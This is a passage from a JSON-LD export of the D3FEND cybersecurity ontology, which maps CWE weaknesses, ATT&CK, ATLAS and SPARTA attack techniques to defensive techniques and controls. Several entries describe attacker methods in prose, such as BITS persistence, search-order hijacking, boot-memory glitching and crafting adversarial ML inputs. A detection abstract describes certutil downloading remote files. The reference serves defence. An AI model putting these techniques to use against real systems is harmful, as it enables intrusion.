      "rdfs:label": "Process Start Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Nd4ff69c0fe1f4fd8b237c5a828fcdb05"
        }
      ]
    },
    {
      "@id": "_:Nd4ff69c0fe1f4fd8b237c5a828fcdb05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-422",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-422",
      "d3f:definition": "The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.",
      "rdfs:label": "Unprotected Windows Messaging Channel ('Shatter')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-360"
        },
        {
          "@id": "d3f:CWE-420"
        }
      ]
    },
    {
      "@id": "d3f:CWE-824",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-824",
      "d3f:definition": "The product accesses or uses a pointer that has not been initialized.",
      "d3f:weakness-of": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "rdfs:label": "Access of Uninitialized Pointer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:Nfa0b422118fd4993b6976b083a91531d"
        }
      ]
    },
    {
      "@id": "_:Nfa0b422118fd4993b6976b083a91531d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:CWE-618",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-618",
      "d3f:definition": "An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser's security model (e.g. the zone or domain).",
      "rdfs:label": "Exposed Unsafe ActiveX Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-749"
      }
    },
    {
      "@id": "d3f:DataDependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Data Dependency exists when a process, operation, or system requires specific data in order to execute correctly.",
      "d3f:synonym": "Transactional Dependency",
      "rdfs:label": "Data Dependency",
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-006%3ACertUtilDownloadWithURLCacheAndSplitArguments_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-006/"
      },
      "d3f:kb-abstract": "Certutil.exe may download a file from a remote destination using -urlcache. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. However, it is uncommon for certutil.exe to write files to world writeable paths. During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments",
      "rdfs:label": "Reference - CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments - MITRE"
    },
    {
      "@id": "d3f:T1608.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.005",
      "d3f:definition": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.",
      "rdfs:label": "Link Target",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:AML.T0043.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.003",
      "d3f:definition": "Adversaries may manually modify the input data to craft adversarial data.\nThey may use their knowledge of the target model to modify parts of the data they suspect helps the model in performing its task.\nThe adversary may use trial and error until they are able to verify they have a working adversarial input.",
      "rdfs:label": "Manual Modification - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Manual Modification"
    },
    {
      "@id": "d3f:BroadcastDomainIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BroadcastDomainIsolation"
      ],
      "d3f:d3fend-id": "D3-BDI",
      "d3f:definition": "Broadcast isolation restricts the number of computers a host can contact on its LAN.",
      "d3f:filters": {
        "@id": "d3f:LocalAreaNetworkTraffic"
      },
      "d3f:kb-article": "## How it works\nSoftware Defined Networking or other network encapsulation technologies intercept host broadcast traffic, then route it to a specified destination per a configured policy.\n\nThis can be implemented within hypervisors, networking hardware (WAPs, switches, routers), or virtual hardware.\n\n## Considerations\nThis technique is highly dependent on network infrastructure and networking requirements.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-BroadcastIsolationAndLevel3NetworkSwitch_HewlettPackardEnterpriseDevelopmentLP"
        },
        {
          "@id": "d3f:Reference-PrivateVirtualLocalAreaNetworkIsolation_CiscoTechnologyInc"
        }
      ],
      "d3f:synonym": "Network Segmentation",
      "rdfs:label": "Broadcast Domain Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N8e7d2927fdd74c23b132e67b9982f283"
        }
      ]
    },
    {
      "@id": "_:N8e7d2927fdd74c23b132e67b9982f283",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1110.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Password"
      },
      "d3f:attack-id": "T1110.002",
      "d3f:definition": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, but this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A)",
      "rdfs:label": "Password Cracking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:Nf97066a2ff7e44f69241ec6243a14b38"
        }
      ]
    },
    {
      "@id": "_:Nf97066a2ff7e44f69241ec6243a14b38",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:OrchestrationServer",
      "@type": "owl:Class",
      "d3f:definition": "A d3f:Server which is involved with the orchestration of workloads or the execution of orchestrated workloads.",
      "rdfs:label": "Orchestration Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Orchestration_(computing)"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:Firewall",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. A firewall typically establishes a barrier between a trusted internal network and untrusted external network, such as the Internet. Firewalls are often categorized as either network firewalls or host-based firewalls. Network firewalls filter traffic between two or more networks and run on network hardware. Host-based firewalls run on host computers and control network traffic in and out of those machines. This definition refers to network firewalls.",
      "d3f:filters": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Firewall",
      "rdfs:seeAlso": {
        "@id": "dbr:Firewall_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerNetworkNode"
        },
        {
          "@id": "_:N026a70f674184f73b23ebf23eb30268a"
        }
      ],
      "skos:altLabel": "Network Firewall"
    },
    {
      "@id": "_:N026a70f674184f73b23ebf23eb30268a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:MotionSensorMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MotionSensorMonitoring"
      ],
      "d3f:d3fend-id": "D3-MSM",
      "d3f:definition": "Monitoring events from motion detectors (e.g., passive IR, microwave, dual-technology) to detect presence or movement within protected areas.",
      "d3f:kb-article": "## How it works\n\nMotion sensors generate events when movement is detected within their coverage pattern. Alarm panels or PACS correlate motion with arming schedules, door openings, and other sensors; video systems can use motion to trigger recording or bookmarks. Cross-zoning and sensitivity/pulse-count settings are commonly adjusted to balance detection and false-alarm rates.\n\n## Considerations\n\n* Place sensors at appropriate height and angle with clear line of sight, avoiding obstructions or reflective surfaces that can cause missed or false detections.\n* Reduce false alarms by tuning sensitivity and pulse-count, using cross-zoning when needed, and accounting for HVAC airflow or rapid thermal changes.\n* Monitor tamper and supervision signals; for wireless devices, verify periodic check-ins and battery levels; perform regular walk tests to validate coverage.\n* Integrate motion events with cameras and with door position switches and other sensors in the protected area to provide context and faster verification; use motion to trigger recording or bookmarks.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
        },
        {
          "@id": "d3f:Reference-Wikipedia-MotionDetector"
        },
        {
          "@id": "d3f:Reference-Wikipedia-PIRSensor"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:MotionDetector"
      },
      "d3f:synonym": [
        "Motion Alarm Monitoring",
        "Motion Detector Monitoring"
      ],
      "rdfs:label": "Motion Sensor Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:Nc8ce299e03c24024aec8cdc0aacdb94e"
        }
      ]
    },
    {
      "@id": "_:Nc8ce299e03c24024aec8cdc0aacdb94e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MotionDetector"
      }
    },
    {
      "@id": "d3f:T1474",
      "@type": "owl:Class",
      "d3f:attack-id": "T1474",
      "d3f:definition": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.",
      "rdfs:label": "Supply Chain Compromise - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Supply Chain Compromise"
    },
    {
      "@id": "d3f:T1197",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1197",
      "d3f:definition": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.",
      "d3f:may-produce": [
        {
          "@id": "d3f:IntranetIPCNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetWebNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundInternetWebTraffic"
        }
      ],
      "rdfs:label": "BITS Jobs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N6c6e3a1823004e5fb349677d9d0e0df8"
        },
        {
          "@id": "_:N0078e2c23b9541af987630f834861261"
        },
        {
          "@id": "_:Ne55a59cca05f40178a6b0599485f983c"
        }
      ]
    },
    {
      "@id": "_:N6c6e3a1823004e5fb349677d9d0e0df8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetIPCNetworkTraffic"
      }
    },
    {
      "@id": "_:N0078e2c23b9541af987630f834861261",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetWebNetworkTraffic"
      }
    },
    {
      "@id": "_:Ne55a59cca05f40178a6b0599485f983c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:TA0033",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Lateral Movement - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:T1027.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.005",
      "d3f:definition": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.",
      "rdfs:label": "Indicator Removal from Tools",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:CCI-001574_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system rejects or delays, as defined by the organization, network traffic which exceeds the organization-defined thresholds.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001574"
    },
    {
      "@id": "d3f:EX-0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0004",
      "d3f:definition": "The attacker manipulates memory and configuration used in the earliest stages of boot so that their code runs before normal protections and integrity checks take hold. Targets include boot ROM vectors, first-stage/second-stage bootloaders, boot configuration words and strap pins, one-time-programmable (OTP) fuses, non-volatile images in flash/EEPROM, and scratch regions copied into RAM during cold start. Techniques range from replacing or patching boot images to flipping configuration bits that alter trust decisions (e.g., image selection, fallback order, watchdog behavior). Faults can be induced deliberately (timed power/clock/EM glitches) or via crafted update/write sequences that leave a partially programmed but executable state. Once resident, the modification can insert early hooks, disable or short-circuit checks, or select downgraded images; destructive variants corrupt the boot path to induce a persistent reset loop or safeing entry (a denial of service). Because boot logic initializes buses, memory maps, and handler tables, even small changes at this stage cascade, shaping how command handlers load, how keys and counters are initialized, and which peripherals are trusted for subsequent execution.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootLoader"
        },
        {
          "@id": "d3f:BootROM"
        }
      ],
      "rdfs:label": "Compromise Boot Memory - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0004/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N56836d2e731f4f609fd8be4b127f37f2"
        },
        {
          "@id": "_:N68f9756e15a1461bb39263803ed4219f"
        }
      ],
      "skos:prefLabel": "Compromise Boot Memory"
    },
    {
      "@id": "_:N56836d2e731f4f609fd8be4b127f37f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "_:N68f9756e15a1461bb39263803ed4219f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootROM"
      }
    },
    {
      "@id": "d3f:CWE-397",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-397",
      "d3f:definition": "The product throws or raises overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions.",
      "rdfs:label": "Declaration of Throws for Generic Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-221"
        },
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-705"
        }
      ]
    },
    {
      "@id": "d3f:CWE-214",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-214",
      "d3f:definition": "A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system.",
      "rdfs:label": "Invocation of Process Using Visible Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-497"
      }
    },
    {
      "@id": "d3f:SystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:carries": {
        "@id": "d3f:TimeInstant"
      },
      "d3f:definition": "In computing, system time represents a computer system's notion of a point in time.",
      "d3f:derived-from": {
        "@id": "d3f:OperatingSystemClock"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:System_time"
      },
      "rdfs:label": "System Time",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemPlatformVariable"
        },
        {
          "@id": "_:N6cbbc9e0cdc843b39e6aef9d4f1229c7"
        },
        {
          "@id": "_:Na5b416181c6242ca8027da33f4d78cb2"
        }
      ]
    },
    {
      "@id": "_:N6cbbc9e0cdc843b39e6aef9d4f1229c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TimeInstant"
      }
    },
    {
      "@id": "_:Na5b416181c6242ca8027da33f4d78cb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:derived-from"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemClock"
      }
    },
    {
      "@id": "d3f:CWE-1286",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1286",
      "d3f:definition": "The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax.",
      "rdfs:label": "Improper Validation of Syntactic Correctness of Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-428",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-428",
      "d3f:definition": "The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.",
      "rdfs:label": "Unquoted Search Path or Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:LogMessageFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Produces an entry in a log.",
      "d3f:produces": {
        "@id": "d3f:DigitalEventRecord"
      },
      "rdfs:label": "Log Message Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N999772d0f65b4809ade63144b7598701"
        }
      ]
    },
    {
      "@id": "_:N999772d0f65b4809ade63144b7598701",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalEventRecord"
      }
    },
    {
      "@id": "d3f:RemoveUserFromGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user is removed from a group, revoking the permissions and privileges associated with the group from the user.",
      "rdfs:label": "Remove User from Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "_:Nd96cfbbe20764e96b9f72ed7ff80c7d6"
        },
        {
          "@id": "_:Nebb9ce29fdb2465d810f92c2a439315d"
        }
      ]
    },
    {
      "@id": "_:Nd96cfbbe20764e96b9f72ed7ff80c7d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:Nebb9ce29fdb2465d810f92c2a439315d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AddUserToGroupEvent"
      }
    },
    {
      "@id": "d3f:CCI-001009_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses cryptographic mechanisms to protect and restrict access to information on portable digital media.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001009"
    },
    {
      "@id": "d3f:T0848",
      "@type": "owl:Class",
      "d3f:attack-id": "T0848",
      "d3f:definition": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection.",
      "rdfs:label": "Rogue Master - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Rogue Master"
    },
    {
      "@id": "d3f:T1461",
      "@type": "owl:Class",
      "d3f:attack-id": "T1461",
      "d3f:definition": "An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen. Several methods exist to accomplish this, including:",
      "rdfs:label": "Lockscreen Bypass - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Lockscreen Bypass"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Decomposition into Policy-relevant Subcomponents",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(13)"
    },
    {
      "@id": "d3f:T1586.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586.002",
      "d3f:definition": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).",
      "rdfs:label": "Email Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1586"
      }
    },
    {
      "@id": "d3f:Timer",
      "@type": "owl:Class",
      "d3f:definition": "A timer or countdown timer is a type of clock that starts from a specified time duration and stops upon reaching 00:00. It can also usually be stopped manually before the whole duration has elapsed. An example of a simple timer is an hourglass. Commonly, a timer triggers an alarm when it ends. A timer can be implemented through hardware or software.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Timer"
      },
      "rdfs:label": "Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Clock"
        },
        {
          "@id": "d3f:RuntimeVariable"
        }
      ]
    },
    {
      "@id": "d3f:T1574.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.008",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.",
      "rdfs:label": "Path Interception by Search Order Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N0553f7c357b74be0b3ab16f1415593b7"
        }
      ]
    },
    {
      "@id": "_:N0553f7c357b74be0b3ab16f1415593b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:REC-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002.01",
      "d3f:definition": "Adversaries enumerate and correlate all identifiers that uniquely tag the vehicle throughout its lifecycle and across systems. Examples include NORAD/Satellite Catalog numbers, COSPAR designators, mission acronyms, spacecraft serials and bus IDs, regulatory call signs, network addresses used by mission services, and any constellation slot or plane tags. These identifiers allow cross-reference across public catalogs, tracking services, regulatory filings, and operator materials, shrinking search spaces for pass prediction, link acquisition, and vendor ecosystem discovery. Seemingly minor clues, like a configuration filename embedding a serial number or an operator using the same short name across environments, can expose test assets or internal tools. Rideshare and hosted-payload contexts introduce additional ambiguity that an attacker can exploit to mask activity or misattribute traffic.",
      "rdfs:label": "Identifiers - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0002"
      },
      "skos:prefLabel": "Identifiers"
    },
    {
      "@id": "d3f:CramersV",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CV",
      "d3f:definition": "Cramér's V (sometimes referred to as Cramér's phi and denoted as φc) is a measure of association between two nominal variables, giving a value between 0 and +1 (inclusive) and is based on Pearson's chi-squared statistic.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Cramér's V. [Link](https://en.wikipedia.org/wiki/Cram%C3%A9r%27s_V)",
      "d3f:synonym": "Cramer's Phi",
      "rdfs:label": "Cramer's V",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:WindowOpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates, opens, reopens, or deletes a file.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtOpenFile"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openfile"
      },
      "rdfs:label": "Windows OpenFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateFile"
        },
        {
          "@id": "d3f:OSAPIOpenFile"
        },
        {
          "@id": "_:N49bd77bf2f854826bb90d5ca3d10ac1a"
        }
      ]
    },
    {
      "@id": "_:N49bd77bf2f854826bb90d5ca3d10ac1a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtOpenFile"
      }
    },
    {
      "@id": "d3f:OperatingMode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating mode designates the specific way a system, product, or service functions for a particular task, configuration, or phase of operation",
      "rdfs:label": "Operating Mode",
      "rdfs:seeAlso": {
        "@id": "https://www.wassonstrategics.com/pdf/Wasson%20-%20System_Phases_Modes_and_States_Rev.%20D%20(10-29-14).pdf"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:OSAPISetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that modifies the execution context of a thread.",
      "d3f:invokes": {
        "@id": "d3f:SetThreadContext"
      },
      "rdfs:label": "OS API Set Thread Context",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nb77ff40e310043c9a18998955fcd6afa"
        }
      ]
    },
    {
      "@id": "_:Nb77ff40e310043c9a18998955fcd6afa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SetThreadContext"
      }
    },
    {
      "@id": "d3f:T1679",
      "@type": "owl:Class",
      "d3f:attack-id": "T1679",
      "d3f:definition": "Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some file extensions that adversaries may avoid encrypting include `.dll`, `.exe`, and `.lnk`.(Citation: Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024)",
      "rdfs:label": "Selective Exclusion",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1540",
      "@type": "owl:Class",
      "d3f:attack-id": "T1540",
      "d3f:definition": "Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1631.001",
      "rdfs:label": "Code Injection - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1631.001"
      },
      "rdfs:subClassOf": [
        {
